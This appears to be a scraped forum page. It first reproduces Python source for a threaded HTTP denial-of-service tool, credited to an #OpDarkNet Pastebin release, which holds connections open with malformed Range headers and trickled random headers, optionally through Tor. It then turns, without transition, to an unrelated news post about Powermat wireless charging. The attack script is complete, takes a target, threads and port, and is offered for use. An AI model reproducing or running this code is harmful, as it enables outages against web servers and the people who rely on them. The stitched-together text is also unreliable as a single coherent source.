.NET CLR 2.0.50727)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)", "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv: Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20100804 Gentoo Firefox/3.6.8", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7" ] class httpPost(Thread): def __init__(self, host, port, tor): Thread.__init__(self) self.host = host self.port = port self.socks = socks.socksocket() 
self.tor = tor self.running = True def _send_http_post(self, pause=10): global stop_now self.socks.send("GET / HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: %s\r\n" "Connection: keep-alive\r\n" "Keep-Alive: 900\r\n" "Range: bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-" "Accept-Encoding: gzip, deflate, compress" % (self.host, random.choice(useragents))) for i in range(0, 9999): if stop_now: self.running = False break p = "X-"+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+": "+random.choice(string.letters+string.digits) print term.BOL+term.UP+term.CLEAR_EOL+"HEADER: %s" % p+term.NORMAL self.socks.send(p+"\r\n") time.sleep(random.uniform(30, 40)) self.socks.close() def run(self): while self.running: while self.running: try: if self.tor: self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "", 9050) self.socks.connect((self.host, self.port)) print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL break except Exception, e: if e.args[0] == 106 or e.args[0] == 60: break print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL time.sleep(1) continue while self.running: try: self._send_http_post() except Exception, e: if e.args[0] == 32 or e.args[0] == 104: print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL self.socks = socks.socksocket() break time.sleep(0.1) pass def usage(): print "./ch.py -t <target> [-r <threads> -p <port> -T -h]" print " -t|--target <Hostname|IP>" print " -r|--threads <Number of threads> Defaults to 256" print " -p|--port <Web Server Port> Defaults to 80" print " -h|--help Shows this help\n" print "Eg. 
./ch.py -t -r 256\n" def main(argv): try: opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="]) except getopt.GetoptError: usage() sys.exit(-1) global stop_now target = '' threads = 256 tor = False port = 80 for o, a in opts: if o in ("-h", "--help"): usage() sys.exit(0) if o in ("-t", "--target"): target = a elif o in ("-r", "--threads"): threads = int(a) elif o in ("-p", "--port"): port = int(a) if target == '' or int(threads) <= 0: usage() sys.exit(-1) print term.DOWN + term.RED + "/*" + term.NORMAL print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL print term.RED + " * Threads: %d" % (threads) + term.NORMAL print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL rthreads = [] for i in range(threads): t = httpPost(target, port, tor) rthreads.append(t) t.start() while len(rthreads) > 0: try: rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()] except KeyboardInterrupt: print "\nShutting down threads...\n" for t in rthreads: stop_now = True t.running = False if __name__ == "__main__": print "\n/*" print "********" print "*"+term.RED + " To Catch a Predator "+term.NORMAL+"*" print "********" print " */\n" main(sys.argv[1:]) Pastebin: #OpDarkNet - Offical Release: Pedo Gun - PEW PEW - Pastebin.com
  24. Wireless charging has become reality by Radu Eftimie | October 21, 2011 Many people would probably agree that nothing is worse, when your schedule is full, than running out of battery on your mobile phone. This problem already seems to have found its solution thanks to Powermat technology, which charges mobile devices on the go, Mashable writes. The wireless battery-charging technology has existed since 2009, and since then the company has been trying to improve the system. Powermat works on the principle of energy transfer by magnetic induction. Energy is transferred from a transmitter built into the base mat of the revolutionary device to a receiver that attaches (through the dedicated connector) to the phone or other gadget that needs charging. The energy transfer, which takes place through the magnetic field, is cut off automatically once the device's battery is fully charged, to avoid wasting energy. The company, which now works with Duracell, General Motors and other big names from several fields, says that in the future the wireless charging system will become available in airports, hotels, cafes, company offices, and in every home as well. Powermat also claims that the technology will become dominant in 10 years. Source and video: Incarcarea wireless a devenit realitate | Hit.ro